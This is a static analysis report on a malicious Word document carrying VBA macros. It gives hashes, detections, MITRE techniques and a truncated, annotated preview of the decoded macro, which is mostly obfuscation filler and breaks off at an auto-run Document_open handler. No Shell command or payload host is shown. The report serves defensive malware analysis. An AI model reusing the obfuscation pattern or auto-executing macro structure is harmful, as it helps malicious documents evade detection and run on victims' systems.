Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6fc82ca62290e968…

MALICIOUS

Office (OLE)

158.1 KB Created: 2018-07-23 11:08:00 (document-internal metadata; attacker-controllable, not a trustworthy timestamp) Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 255634db8d9523706827121a4356c147 SHA-1: 5a1dca6d7bf0a86292b6a3d9f74679ee9c541f98 SHA-256: 6fc82ca62290e96817a853633d9a4c0ef58c48fe60d55999c6a3ac3a0c924da4
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Word document (OLE/.doc) carrying VBA macros. The static heuristics report an auto-executing `Document_Open` handler together with a `Shell()` call, which indicates the macro is built to run an external command as soon as the document is opened; the ClamAV signature (Doc.Malware.Valyria) corroborates this. Note that the `Shell()` invocation and its command line are not visible in the truncated macro preview below — the visible portion is almost entirely junk padding (dead conditionals over undeclared variables, executed under `On Error Resume Next`, a common macro-obfuscator pattern) — so whether the command downloads and runs a second-stage payload is an inference from the detections, not something this report confirms. Recovering the actual command requires reading the full decoded artifact (macros.bas, 29,534 bytes) or detonating the sample in a sandbox.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-10026440-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10026440-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
Auto-executing Document_Open event handler present (declared as `Private Sub Document_open()` in the extracted module; VBA procedure names are case-insensitive, so it still fires when the document is opened unless macros are blocked).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace URI found in ordinary Office files; it is not a download or command-and-control location and should not be treated as an indicator of compromise.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29534 bytes
SHA-256: 1bf68875b137a1cc844bf647b923b5e0afc8f0781c79ffadbe68c97eef35856d
Preview script
First 1,000 lines of the extracted script (the listing on this page is cut off shortly after the start of Document_open; the remainder, including whatever reaches Shell(), is only in the full macros.bas artifact)
Attribute VB_Name = "mVMLiwfHzQGmN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module attribute header as exported by olevba. VB_Base = "1Normal.ThisDocument"
' marks this as the document's own class module (ThisDocument), which is where a
' Document_open event handler must live to run automatically when the file opens.
' The random-looking VB_Name is consistent with generated/obfuscated code.
' No Option Explicit line follows, so the undeclared names used throughout the
' module are implicit Variants that read as Empty unless assigned somewhere
' outside the visible preview.
' Junk/padding routine (opaque-predicate filler), not part of the payload logic.
' Every identifier in the conditions is undeclared in the visible module and is
' never assigned here, so each reads as an Empty Variant. `Empty Xor 11` is 11,
' i.e. True, so the deliberately empty Then-branch is taken and the ElseIf and its
' inner Oct() assignment never execute. No value is assigned to the function
' name, so it returns Empty. Not called from any code visible in this preview;
' any run-time error inside is swallowed by On Error Resume Next.
Private Function DqGrcBsalmcUp()
On Error Resume Next
   ' Each block below has the same shape: an always-true Xor test with an empty
   ' body, followed by an unreachable ElseIf. Constants (41517, 4692, ...) are
   ' randomised filler and carry no meaning.
   If HlPMG Xor 11 Then
      ElseIf OfOpP Eqv dKPwb Then
      If dWETnc = lBSAVo Then
         GEzZJ = Oct(STdfwX * 41517)
      End If
   End If
   If dBprN Xor 11 Then
      ElseIf JEozm Eqv UAvftB Then
      If KZNpmr = KtZXQG Then
         RXRLd = Oct(rzzIbW * 4692)
      End If
   End If
   If Truqnu Xor 11 Then
      ElseIf ChnwNp Eqv LznMI Then
      If DHznv = hVYKml Then
         fHNTYB = Oct(AJrjzW * 52570)
      End If
   End If
   If hACWV Xor 11 Then
      ElseIf uQLDA Eqv OPfRhj Then
      If DciTP = INaEOP Then
         dqMYUt = Oct(QWHFIc * 78715)
      End If
   End If
   If SDlhBr Xor 11 Then
      ElseIf ZUYTz Eqv QiANH Then
      If pimowS = NEKYwZ Then
         rLLNl = Oct(woQlTI * 4604)
      End If
   End If
End Function
' Junk/padding routine of the same family as DqGrcBsalmcUp, with two filler
' shapes mixed together. All identifiers are undeclared in the visible module
' and never assigned here, so they read as Empty. No return value is assigned
' (the function yields Empty) and nothing visible in this preview calls it.
Private Function UQjFdMtH()
On Error Resume Next
   ' Shape A: `Empty <= Empty` is True, so this branch runs. `Set` of a
   ' non-object Variant raises a run-time error (Object required) that
   ' On Error Resume Next hides; the arithmetic then stores a value in a local
   ' that is never read. Pure side-effect-free filler.
   If iKYVLU <= GqVAr Then
      Set kLtVb = PJTpTl
      cBNIv = (lWHuQ * aOIqz - zzfYku + qqkXL + 41045 - jmsFs)
   End If
   If tFsdQd <= BiGTT Then
      Set VltERT = ERAzvZ
      UnWCw = (WEunu * QwpIi - rcjzs + oYoVbF + 86446 - rSwNLD)
   End If
   ' Shape B: always-true Xor test with an empty Then-body; the ElseIf and
   ' its Oct() assignment are unreachable.
   If FIijw Xor 11 Then
      ElseIf RVQivN Eqv fGJHRd Then
      If kzCrO = lDlFoa Then
         jQwqSw = Oct(tIwojS * 76101)
      End If
   End If
   If MUdWBK Xor 11 Then
      ElseIf JMziPK Eqv XtPQp Then
      If XiZQp = EZBuU Then
         iMWff = Oct(fmnSq * 97927)
      End If
   End If
   If WRrGJ <= DzPIVu Then
      Set zbWvh = ZbAco
      NczAbw = (joFSFl * rVrFSj - ctrZSi + uaWoDM + 91927 - FwnMv)
   End If
End Function
' Junk/padding routine: seven copies of the always-true `X Xor 11` pattern with
' an empty Then-body and an unreachable ElseIf. All names are undeclared in the
' visible module and never assigned here (Empty), no return value is set, and
' nothing visible in this preview calls it. Analysts can skip it; it exists to
' inflate the module and defeat naive signature matching.
Private Function YSTjndVYH()
On Error Resume Next
   If ADPCwX Xor 11 Then
      ElseIf iznrGt Eqv QRDNo Then
      If QJXBYV = uIRXLz Then
         zhnLsi = Oct(ofPNp * 88771)
      End If
   End If
   If flIGO Xor 11 Then
      ElseIf VKjKBj Eqv GWWoiL Then
      If utzfm = tYsjY Then
         ioqwB = Oct(OModO * 97741)
      End If
   End If
   If ttFjWc Xor 11 Then
      ElseIf jNidpz Eqv jPjHT Then
      If iirVF = cdHnia Then
         wPXRb = Oct(wFAahO * 86621)
      End If
   End If
   If wrcAmL Xor 11 Then
      ElseIf NEqBc Eqv GCfLs Then
      If RamjQS = CDQKnQ Then
         sWVGC = Oct(uIDJn * 12894)
      End If
   End If
   If tjFocE Xor 11 Then
      ElseIf LLHLir Eqv AwuDk Then
      If MjhZI = iJXdw Then
         nwJUK = Oct(KMcjK * 25732)
      End If
   End If
   If zzhib Xor 11 Then
      ElseIf NPCki Eqv zOYZvC Then
      If BKIwEi = MiDJG Then
         QNiIG = Oct(zlkAV * 64745)
      End If
   End If
   If CLdaX Xor 11 Then
      ElseIf NBUSF Eqv CnmZGV Then
      If dHTOq = QSwlCO Then
         GIWdCF = Oct(nwMLwT * 46038)
      End If
   End If
End Function
' Junk/padding routine: five copies of the always-true `X Xor 11` pattern with
' an empty Then-body and an unreachable ElseIf, identical in structure to
' DqGrcBsalmcUp. All names are undeclared in the visible module and never
' assigned here (Empty); no return value is set; nothing visible in this preview
' calls it. The real behaviour reported by the heuristics (Shell()) is not in
' this function.
Private Function wrzHrQbvhRSf()
On Error Resume Next
   If sIzRMo Xor 11 Then
      ElseIf LVLEh Eqv wIrdQJ Then
      If IBTYu = FrPnK Then
         OVqLd = Oct(ZKnNj * 88657)
      End If
   End If
   If nCNhD Xor 11 Then
      ElseIf ZalrpZ Eqv Ljjwh Then
      If DSIHw = Hrzcu Then
         ZhVNC = Oct(ikUbnk * 98644)
      End If
   End If
   If OPoWC Xor 11 Then
      ElseIf scGLwP Eqv FDCMMb Then
      If mpHnU = dPBjzl Then
         YnwHK = Oct(pjfTz * 18218)
      End If
   End If
   If zNaHR Xor 11 Then
      ElseIf toGiuQ Eqv vwZwr Then
      If PsAzj = Nwjbi Then
         IaKId = Oct(UcVjt * 29164)
      End If
   End If
   If zpbolu Xor 11 Then
      ElseIf cSQBIa Eqv DYTBSF Then
      If oUQkE = jUanl Then
         KZBFvG = Oct(AVYjF * 67510)
      End If
   End If
End Function
Private Sub Document_open()
On Error Resume Next
   If ltMnWY Xor iCwVIY Then
      For BkhpY = 22 To Jqsfr
         kzNCb = 74081 * jwNaQ + dFUmZ + sImaK - jqihuB - vAocVz + jAobo - QluCp / 7684 / WzNwX / 6199 - rva
... (truncated)